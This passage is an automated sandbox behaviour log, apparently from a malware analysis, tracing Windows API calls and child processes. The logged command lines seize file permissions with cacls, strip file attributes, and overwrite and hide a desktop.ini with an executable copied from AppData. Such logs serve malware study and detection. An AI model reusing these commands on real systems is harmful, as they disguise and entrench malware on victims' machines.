hFindFile=0x35e448 | out: hFindFile=0x35e448) returned 1 [0126.642] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x22f040, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f040) returned 0xffffffff [0126.642] GetLastError () returned 0x2 [0126.642] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x22f040, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f040) returned 0x35e448 [0126.642] FindClose (in: hFindFile=0x35e448 | out: hFindFile=0x35e448) returned 1 [0126.642] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0126.642] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0126.642] GetConsoleTitleW (in: lpConsoleTitle=0x22f538, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0126.642] 
InitializeProcThreadAttributeList (in: lpAttributeList=0x22f3c0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22f488 | out: lpAttributeList=0x22f3c0, lpSize=0x22f488) returned 1 [0126.642] UpdateProcThreadAttribute (in: lpAttributeList=0x22f3c0, dwFlags=0x0, Attribute=0x60001, lpValue=0x22f480, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22f3c0, lpPreviousValue=0x0) returned 1 [0126.642] GetStartupInfoW (in: lpStartupInfo=0x22f37c | out: lpStartupInfo=0x22f37c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0126.643] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0126.643] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x22f41c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22f468 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\"", lpProcessInformation=0x22f468*(hProcess=0x4c, hThread=0x50, dwProcessId=0xfb8, dwThreadId=0xfbc)) returned 1 [0126.652] CloseHandle (hObject=0x50) returned 1 [0126.652] SetEnvironmentVariableW (lpName="COPYCMD", 
lpValue=0x0) returned 1 [0126.652] GetEnvironmentStringsW () returned 0x3622f8* [0126.653] FreeEnvironmentStringsW (penv=0x3622f8) returned 1 [0126.653] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0126.835] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x22f35c | out: lpExitCode=0x22f35c*=0x0) returned 1 [0126.835] CloseHandle (hObject=0x4c) returned 1 [0126.835] _vsnwprintf (in: _Buffer=0x22f4a4, _BufferCount=0x13, _Format="%08X", _ArgList=0x22f368 | out: _Buffer="00000000") returned 8 [0126.835] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0126.835] GetEnvironmentStringsW () returned 0x3622f8* [0126.835] FreeEnvironmentStringsW (penv=0x3622f8) returned 1 [0126.835] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0126.835] GetEnvironmentStringsW () returned 0x3622f8* [0126.835] FreeEnvironmentStringsW (penv=0x3622f8) returned 1 [0126.835] DeleteProcThreadAttributeList (in: lpAttributeList=0x22f3c0 | out: lpAttributeList=0x22f3c0) [0126.835] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.835] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0126.835] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.836] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0126.836] _get_osfhandle (_FileHandle=0) returned 0x3 [0126.836] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0126.836] SetConsoleInputExeNameW () returned 0x1 [0126.836] GetConsoleOutputCP () returned 0x1b5 [0126.836] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0126.836] SetThreadUILanguage (LangId=0x0) returned 0x409 [0126.836] exit (_Code=0) Process: id = "73" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16920" os_pid = "0xfac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" 
parent_id = "72" os_parent_pid = "0xf90" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9906 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9907 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9908 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9909 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 9910 start_va = 0x3e0000 end_va = 0x3e8fff entry_point = 0x3e0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 9911 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9912 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9913 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x000000007ffb0000" filename = "" Region: id = 9914 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 9915 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 9916 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9917 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 9918 start_va = 0x60000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 9919 start_va = 0xe0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 9920 start_va = 0x1e0000 end_va = 0x246fff entry_point = 0x1e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9921 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9922 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9923 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9924 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = 
"\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 9925 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9926 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9927 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 129 os_tid = 0xfb0 Thread: id = 130 os_tid = 0xfb4 Process: id = "74" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea168a0" os_pid = "0xfb8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "72" os_parent_pid = "0xf90" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9930 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9931 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9932 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000040000" filename = "" Region: id = 9933 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 9934 start_va = 0x2c0000 end_va = 0x2c6fff entry_point = 0x2c0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 9935 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9936 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9937 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 9938 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 9939 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 9940 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9941 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 9942 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9943 start_va = 0x480000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename 
= "" Region: id = 9944 start_va = 0x770000 end_va = 0x77ffff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 9945 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 9946 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9947 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9948 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 9949 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9950 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 9951 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9952 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 9953 start_va = 
0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 9954 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9955 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 9956 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 9957 start_va = 0x110000 end_va = 0x1d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 9958 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 9959 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 131 os_tid = 0xfbc Process: id = "75" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16900" os_pid = "0xfcc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > 
\"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10086 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10087 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10088 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10089 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 10090 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 10091 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10092 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10093 start_va = 0x7ffb0000 end_va = 
0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10094 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 10095 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10120 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10121 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10122 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10123 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 10124 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 10125 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 10126 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10127 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 10128 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 
0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10129 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10130 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10131 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 10132 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10133 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 10134 start_va = 0x460000 end_va = 0x527fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10135 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10136 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 10137 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 10138 
start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 10139 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 10140 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 10141 start_va = 0x530000 end_va = 0x630fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10142 start_va = 0x640000 end_va = 0x123ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 10143 start_va = 0x1240000 end_va = 0x13a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Region: id = 10144 start_va = 0x13b0000 end_va = 0x167efff entry_point = 0x13b0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 133 os_tid = 0xfd0 [0127.109] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f834 | out: lpSystemTimeAsFileTime=0x18f834*(dwLowDateTime=0x85b279c0, dwHighDateTime=0x1d440a9)) [0127.109] GetCurrentProcessId () returned 0xfcc [0127.109] GetCurrentThreadId () returned 0xfd0 [0127.109] GetTickCount () returned 0x28d6f [0127.109] QueryPerformanceCounter (in: lpPerformanceCount=0x18f82c | out: lpPerformanceCount=0x18f82c*=18389836402) returned 1 [0127.110] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0127.110] __set_app_type (_Type=0x1) [0127.110] __p__fmode () returned 0x76b331f4 [0127.110] __p__commode () returned 0x76b331fc [0127.110] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0127.111] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, 
_DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0127.111] GetCurrentThreadId () returned 0xfd0 [0127.111] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfd0) returned 0x38 [0127.111] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0127.111] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0127.111] SetThreadUILanguage (LangId=0x0) returned 0x409 [0127.112] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0127.112] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f7c4 | out: phkResult=0x18f7c4*=0x0) returned 0x2 [0127.112] VirtualQuery (in: lpAddress=0x18f7fb, lpBuffer=0x18f794, dwLength=0x1c | out: lpBuffer=0x18f794*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0127.112] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f794, dwLength=0x1c | out: lpBuffer=0x18f794*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0127.112] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f794, dwLength=0x1c | out: lpBuffer=0x18f794*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0127.112] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18f794, dwLength=0x1c | out: lpBuffer=0x18f794*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0127.112] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f794, dwLength=0x1c | out: lpBuffer=0x18f794*(BaseAddress=0x190000, AllocationBase=0x190000, 
AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0127.112] GetConsoleOutputCP () returned 0x1b5 [0127.112] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0127.112] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0127.112] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.112] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0127.112] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.112] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0127.113] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.113] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0127.113] _get_osfhandle (_FileHandle=0) returned 0x3 [0127.113] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0127.113] _get_osfhandle (_FileHandle=0) returned 0x3 [0127.113] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0127.113] GetEnvironmentStringsW () returned 0x3704e8* [0127.113] FreeEnvironmentStringsW (penv=0x3704e8) returned 1 [0127.114] GetEnvironmentStringsW () returned 0x3704e8* [0127.114] FreeEnvironmentStringsW (penv=0x3704e8) returned 1 [0127.114] RegOpenKeyExW (in: hKey=0x80000002, 